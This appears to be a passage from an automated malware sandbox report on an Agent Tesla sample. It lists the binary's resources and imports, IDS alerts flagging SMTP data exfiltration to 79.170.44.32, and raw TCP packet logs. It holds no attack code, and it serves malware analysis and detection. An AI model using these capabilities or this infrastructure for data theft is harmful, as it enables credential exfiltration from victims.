                              RT_ICON0x1302a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.34263602251407127
                              RT_ICON0x1313480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.48114754098360657
                              RT_ICON0x131cd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.574468085106383
                              RT_MENU0x1321380x50dataEnglishGreat Britain0.9
                              RT_STRING0x1321880x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0x13271c0x68adataEnglishGreat Britain0.2747909199522103
                              RT_STRING0x132da80x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0x1332380x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0x1338340x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0x133e900x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0x1342f80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0x1344500x5552edata1.0003319160138031
                              RT_GROUP_ICON0x1899800x84dataEnglishGreat Britain0.7196969696969697
                              RT_GROUP_ICON0x189a040x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0x189a180x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0x189a2c0x14dataEnglishGreat Britain1.25
                              RT_VERSION0x189a400xdcdataEnglishGreat Britain0.6181818181818182
                              RT_MANIFEST0x189b1c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                              DLLImport
                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain
                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              07/01/24-20:28:15.672861TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249746587192.168.2.479.170.44.32
                              07/01/24-20:27:10.465136TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49739587192.168.2.479.170.44.32
                              07/01/24-20:28:55.662732TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49751587192.168.2.479.170.44.32
                              07/01/24-20:27:54.008944TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49744587192.168.2.479.170.44.32
                              07/01/24-20:27:49.212686TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49743587192.168.2.479.170.44.32
                              07/01/24-20:29:20.588265TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249754587192.168.2.479.170.44.32
                              07/01/24-20:28:17.781472TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49747587192.168.2.479.170.44.32
                              07/01/24-20:25:22.036965TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49731587192.168.2.479.170.44.32
                              07/01/24-20:25:22.036854TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49731587192.168.2.479.170.44.32
                              07/01/24-20:27:36.709148TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249742587192.168.2.479.170.44.32
                              07/01/24-20:28:55.662732TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49751587192.168.2.479.170.44.32
                              07/01/24-20:28:17.781472TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49747587192.168.2.479.170.44.32
                              07/01/24-20:29:11.831875TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49753587192.168.2.479.170.44.32
                              07/01/24-20:29:20.587012TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49754587192.168.2.479.170.44.32
                              07/01/24-20:27:10.465136TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49739587192.168.2.479.170.44.32
                              07/01/24-20:27:36.708969TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49742587192.168.2.479.170.44.32
                              07/01/24-20:27:22.436606TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49740587192.168.2.479.170.44.32
                              07/01/24-20:25:22.036965TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249731587192.168.2.479.170.44.32
                              07/01/24-20:27:10.465136TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49739587192.168.2.479.170.44.32
                              07/01/24-20:28:55.662771TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249751587192.168.2.479.170.44.32
                              07/01/24-20:27:54.008944TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49744587192.168.2.479.170.44.32
                              07/01/24-20:28:15.672815TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49746587192.168.2.479.170.44.32
                              07/01/24-20:28:01.279510TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49745587192.168.2.479.170.44.32
                              07/01/24-20:25:22.036965TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49731587192.168.2.479.170.44.32
                              07/01/24-20:28:01.279625TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249745587192.168.2.479.170.44.32
                              07/01/24-20:27:10.465306TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249739587192.168.2.479.170.44.32
                              07/01/24-20:27:49.212686TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49743587192.168.2.479.170.44.32
                              07/01/24-20:28:55.662704TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49751587192.168.2.479.170.44.32
                              07/01/24-20:28:15.672815TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49746587192.168.2.479.170.44.32
                              07/01/24-20:27:22.436606TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49740587192.168.2.479.170.44.32
                              07/01/24-20:29:11.831915TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49753587192.168.2.479.170.44.32
                              07/01/24-20:28:36.337233TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49748587192.168.2.479.170.44.32
                              07/01/24-20:29:07.465085TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49752587192.168.2.479.170.44.32
                              07/01/24-20:29:20.587012TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49754587192.168.2.479.170.44.32
                              07/01/24-20:27:54.008911TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49744587192.168.2.479.170.44.32
                              07/01/24-20:28:01.279551TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49745587192.168.2.479.170.44.32
                              07/01/24-20:28:36.337328TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249748587192.168.2.479.170.44.32
                              07/01/24-20:27:36.709124TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49742587192.168.2.479.170.44.32
                              07/01/24-20:29:07.465136TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249752587192.168.2.479.170.44.32
                              07/01/24-20:25:22.036965TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49731587192.168.2.479.170.44.32
                              07/01/24-20:27:22.436582TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49740587192.168.2.479.170.44.32
                              07/01/24-20:28:01.279551TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49745587192.168.2.479.170.44.32
                              07/01/24-20:27:54.008982TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249744587192.168.2.479.170.44.32
                              07/01/24-20:29:11.831915TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49753587192.168.2.479.170.44.32
                              07/01/24-20:28:17.781450TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49747587192.168.2.479.170.44.32
                              07/01/24-20:29:07.465085TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49752587192.168.2.479.170.44.32
                              07/01/24-20:28:17.783319TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249747587192.168.2.479.170.44.32
                              07/01/24-20:27:49.212618TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49743587192.168.2.479.170.44.32
                              07/01/24-20:28:36.337328TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49748587192.168.2.479.170.44.32
                              07/01/24-20:29:11.831952TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249753587192.168.2.479.170.44.32
                              07/01/24-20:27:22.436734TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249740587192.168.2.479.170.44.32
                              07/01/24-20:28:36.337328TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49748587192.168.2.479.170.44.32
                              07/01/24-20:27:36.709124TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49742587192.168.2.479.170.44.32
                              07/01/24-20:29:07.465069TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49752587192.168.2.479.170.44.32
                              07/01/24-20:28:15.672800TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49746587192.168.2.479.170.44.32
                              07/01/24-20:29:20.587012TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49754587192.168.2.479.170.44.32
                              07/01/24-20:27:49.212736TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249743587192.168.2.479.170.44.32
                              TimestampSource PortDest PortSource IPDest IP
                              Jul 1, 2024 20:25:18.419693947 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.419724941 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:18.419802904 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.432101965 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.432112932 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:18.910468102 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:18.910586119 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.913753986 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.913764000 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:18.913983107 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:18.957185030 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:18.966917038 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:19.008527040 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:19.078680992 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:19.078743935 CEST44349730104.26.12.205192.168.2.4
                              Jul 1, 2024 20:25:19.078834057 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:19.085501909 CEST49730443192.168.2.4104.26.12.205
                              Jul 1, 2024 20:25:19.753283978 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:19.759207010 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:19.759274960 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:20.732445955 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:20.732642889 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:20.737683058 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:20.920974970 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:20.922017097 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:20.927027941 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.109067917 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.109325886 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:21.114300013 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.301157951 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.301393032 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:21.306246042 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.488816977 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.488975048 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:21.494349003 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.833760023 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:21.833945036 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:21.839176893 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.036159039 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.036854029 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:22.036964893 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:22.036964893 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:22.036964893 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:25:22.041878939 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.046334028 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.046792030 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.046806097 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.453134060 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:25:22.504117012 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:26:59.707380056 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:26:59.713464975 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:00.096755981 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:00.097325087 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:00.105726957 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:00.105726957 CEST49731587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:00.110766888 CEST5874973179.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:08.706722021 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:08.712594032 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:08.712901115 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:09.308615923 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.308748960 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:09.313673019 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.495465040 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.495635986 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:09.500508070 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.684573889 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.684802055 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:09.689723015 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.876250029 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:09.876403093 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:09.881366014 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.065507889 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.073518038 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.079065084 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.270013094 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.277075052 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.282160997 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.463644028 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.465136051 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.465136051 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.465136051 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.465306044 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.468758106 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.470107079 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.470138073 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.470187902 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.470216990 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.470305920 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.473664999 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.473697901 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.473831892 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.473860025 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.473886967 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.473941088 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.475147963 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.477008104 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.478859901 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.478924036 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.478954077 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.479006052 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.479060888 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.479140997 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.479178905 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.479302883 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.479698896 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.480073929 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.481977940 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.482074022 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.482084036 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.482181072 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.484225988 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484312057 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484363079 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484402895 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.484462023 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484510899 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484539032 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484563112 CEST49739587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:10.484591007 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484658957 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484702110 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.484730005 CEST5874973979.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:10.485117912 CEST5874973979.170.44.32192.168.2.4
